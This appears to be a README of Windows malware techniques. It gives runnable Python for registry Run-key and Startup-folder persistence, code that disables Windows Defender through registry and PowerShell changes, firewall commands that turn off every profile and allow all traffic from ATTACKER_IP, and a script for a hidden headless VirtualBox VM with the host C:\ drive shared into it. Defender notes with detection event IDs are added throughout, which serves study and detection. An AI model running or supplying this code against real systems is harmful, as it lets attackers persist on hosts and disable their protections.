1 |
2 |
3 |
4 | WinPersistence
5 |
6 |
7 |
8 | ### Description
9 | Some of the techniques used by Windows malware: persistence (HKCU registry keys, Startup folder), disabling Windows Firewall, and disabling Windows Defender.
10 |
11 |
12 |
13 |
14 | ### Registry Key
15 | ```python
16 |
def reg_windows():
    """Attempt to register ``malw_location`` under the HKCU autostart (Run*) keys.

    Each ``reg add`` call writes a ``REG_SZ`` value named ``Evil`` whose data is
    the executable path, so that the program is launched at user logon. The keys
    live under HKEY_CURRENT_USER, so no elevation is required for the write.

    Defender notes (MITRE ATT&CK T1547.001, Registry Run Keys / Startup Folder):
    - Value-set events on ``HKCU ...\\CurrentVersion\\Run`` and ``RunOnce`` are a
      classic persistence indicator: Sysmon Event ID 13 (RegistryEvent, value
      set), Security Event ID 4657 when a SACL is applied to the keys, and the
      Logon tab of Sysinternals Autoruns.
    - A ``reg.exe`` child of a Python (or otherwise unexpected) process with
      ``add ... \\Run`` on its command line is a straightforward process-creation
      detection (Sysmon Event ID 1 / Security 4688 with command-line auditing).
    - ``RunServices`` / ``RunServicesOnce`` are legacy locations; seeing them
      written at all is unusual on modern hosts and worth alerting on.
    """
    from os import system , environ
    malw_location = environ["appdata"]+"\\anyname.exe" # You can add any name to your Malware and any other path other than this
    # Four autostart locations are written with the same value name and data.
    system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d'+ malw_location +'"', shell=True)
    system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d'+ malw_location +'"', shell=True)
    system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d'+ malw_location +'"', shell=True)
    system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d'+ malw_location +'"', shell=True)
24 |
25 |
26 | ```
27 | ### StartUp
28 | ```python
29 | from os import environ , system
30 | from sys import executable
31 | from shutil import copyfile
class Reg:
    """Persist the running executable via the per-user Startup folder, with an HKCU Run value as fallback.

    Both locations execute at user logon without elevation
    (MITRE ATT&CK T1547.001, Registry Run Keys / Startup Folder).

    Defender notes:
    - A new ``.exe`` under ``%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup``
      is a file-creation indicator (Sysmon Event ID 11, or Security 4663 with a
      SACL on the folder); Sysinternals Autoruns lists the folder's contents.
    - The fallback writes ``HKCU ...\\CurrentVersion\\Run`` (Sysmon Event ID 13 /
      Security 4657) by spawning ``reg.exe`` from a Python process
      (Sysmon Event ID 1 / Security 4688 with command-line auditing).
    """

    def __init__(self):
        # Target path inside the current user's Startup folder.
        self.malw_location = environ["appdata"]+"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\anyname.exe"

    def startup(self):
        """Copy ``sys.executable`` into the Startup folder, then also try an HKCU Run-key entry.

        ``executable`` is the running interpreter or, for a frozen build, the
        packaged binary (presumably the intent here -- not shown in this snippet).
        Copy errors are printed and otherwise ignored.
        """
        try:
            # Only copy when the file is not already present.
            if not path.exists(self.malw_location):
                copyfile(executable, self.malw_location)
        except Exception as e:
            print(e)
        # Also try to register the same path under the HKCU Run key.
        from os import system , environ
        try:
            system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d'+ self.malw_location +'"', shell=True)
        except:
            # Bare except: on any failure, retry with a path directly under %APPDATA%.
            self.malw_location = environ["appdata"]+"anyname.exe"
            system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d'+ self.malw_location +'"', shell=True)
48 |
49 |
# Module-level side effect: the persistence routine runs as soon as this file is executed or imported.
De3vil = Reg()
De3vil.startup()
52 | ```
53 | ### Disable Windows Defender
54 | ```python
55 |
def DisableWindowsDefender():
    """Attempt to weaken Microsoft Defender via a PowerShell preference change and registry edits.

    Steps, as written:
    1. If the process is elevated (``IsUserAnAdmin()`` returns 1), try to turn
       off real-time monitoring with ``Set-MpPreference``.
    2. Regardless of elevation, issue ``reg`` commands that set the
       ``DefenderApiLogger`` autologger ``Start`` to 0, set the
       ``SecurityHealthService`` ``Start`` to 4 (disabled), delete the Defender
       policy key, and then re-create it with ``DisableAntiSpyware`` /
       ``DisableAntiVirus`` set to 1. All of these keys are under HKLM, so the
       writes require administrative rights; any exception is swallowed.

    Defender notes (MITRE ATT&CK T1562.001, Impair Defenses: Disable or Modify Tools):
    - With Tamper Protection enabled, Defender rejects
      ``Set-MpPreference -DisableRealtimeMonitoring`` and the
      ``DisableAntiSpyware`` policy; keep it on.
    - Successful changes are logged in ``Microsoft-Windows-Windows Defender/Operational``
      (Event ID 5001 real-time protection disabled, 5007 configuration changed --
      confirm on your build).
    - Value-set events under ``HKLM ...\\Policies\\Microsoft\\Windows Defender`` and
      ``...\\WMI\\Autologger\\DefenderApiLogger`` are high-fidelity registry
      indicators (Sysmon Event ID 13 / Security 4657 with a SACL).
    - ``reg.exe`` or ``powershell.exe`` spawned by an unexpected parent with these
      command lines is a process-creation detection (Sysmon Event ID 1 /
      Security 4688 with command-line auditing).
    """
    import ctypes, sys
    import subprocess
    if ctypes.windll.shell32.IsUserAnAdmin() == 1: # 1 == True (admin ):: 0 == False
        subprocess.call("Set-MpPreference -DisableRealtimeMonitoring $true",shell=True)
    else:
        pass
    try:
        # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions
        subprocess.call('reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f')
        # Disable Windows Defender Security Center
        subprocess.call('"reg add HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f"')
        # Disable Real Time Protection
        subprocess.call('reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f ')
        # or
        subprocess.call('reg add"HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f')
        # or
        subprocess.call('reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f')
    except Exception:
        # Best-effort: failures (typically lack of elevation) are silently ignored.
        pass
76 |
77 | ```
78 | > You can also use Task Scheduler to create a new task.
79 | > You can do this using Python with `pip install apscheduler`.
80 | ### Disable Windows Firewall
81 |
82 | ```powershell
# Show the current state and settings of all three profiles (Domain, Private, Public).
Netsh Advfirewall show allprofiles
# Turn the host firewall off for every profile (MITRE ATT&CK T1562.004, Disable or
# Modify System Firewall). Defender notes: profile state changes are written to the
# "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall" log (Event ID
# 2003, setting changed -- confirm on your build); Group Policy can enforce the profile
# state so local changes are reverted; and a netsh.exe process with "set allprofiles
# state off" on its command line is a direct process-creation detection.
NetSh Advfirewall set allprofiles state off

# ip whitelisting
# Adds an inbound allow-all rule scoped to a single remote address (ATTACKER_IP is a
# placeholder). Defender notes: rule creation is logged as Event ID 2004 in the same
# channel (confirm); rules with names outside the organisation's convention, or that
# allow "Protocol ANY" from one external address, are worth alerting on.
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
88 | ```
89 |
90 |
91 | ### Virtual Machines
92 |
93 | ```ps1
# The sequence below installs VirtualBox on the host, registers a guest VM from a
# downloaded disk image, starts it headless and shares the host's C:\ drive into it.
# Running tooling inside a guest keeps it outside the view of host-based AV/EDR
# (MITRE ATT&CK T1564.006, Hide Artifacts: Run Virtual Instance); the VM description
# used here, "Shadowbunny", is the name this technique is commonly known by.
# Defender notes:
# - Unexpected hypervisor installs on endpoints are the primary signal: execution of
#   the VirtualBox installer, new VirtualBox drivers/services, and VBoxManage.exe
#   process creation. Application control (WDAC / AppLocker) can block unapproved
#   installers outright.
# - The sharedfolder step near the end maps the whole host drive into the guest with
#   read/write access; treat such a mapping as a data-access and exfiltration path.
# - A headless VM with a NAT adapter has network access through the host; egress
#   monitoring on the host still sees this traffic, but host process attribution is lost.

# download virtualbox
Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe

# perform a silent install and avoid creating desktop and quick launch icons
VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0

# in \Program Files\Oracle\VirtualBox\VBoxManage.exe
# Disabling notifications
# (suppresses the GUI message popups that would otherwise reveal VM activity to the user)
.\VBoxManage.exe setextradata global GUI/SuppressMessages "all"

# Download the Virtual machine disk
# (copied from an SMB share; the share access itself is visible in file-server / network logs)
Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd

# Create a new VM
# (the innocuous name "IT Recovery" is chosen to blend in; inventory VMs by content, not name)
$vmname = "IT Recovery"
.\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register

# Add a network card in NAT mode
.\VBoxManage.exe modifyvm $vmname --ioapic on # required for 64bit
.\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128
.\VBoxManage.exe modifyvm $vmname --nic1 nat
.\VBoxManage.exe modifyvm $vmname --audio none
.\VBoxManage.exe modifyvm $vmname --graphicscontroller vmsvga
.\VBoxManage.exe modifyvm $vmname --description "Shadowbunny"

# Mount the VHD file
.\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata
.\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0

# Start the VM
# (headless: no window is shown to the logged-on user)
.\VBoxManage.exe startvm $vmname –type headless


# optional - adding a shared folder
# require: VirtualBox Guest Additions
# (exposes the entire host C:\ drive to the guest and auto-mounts it)
.\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount
# then mount the folder in the VM
# (the two lines below run inside the Linux guest, not on the Windows host)
sudo mkdir /mnt/c
sudo mount -t vboxsf shadow_c /mnt/c
133 | ```
134 |
135 |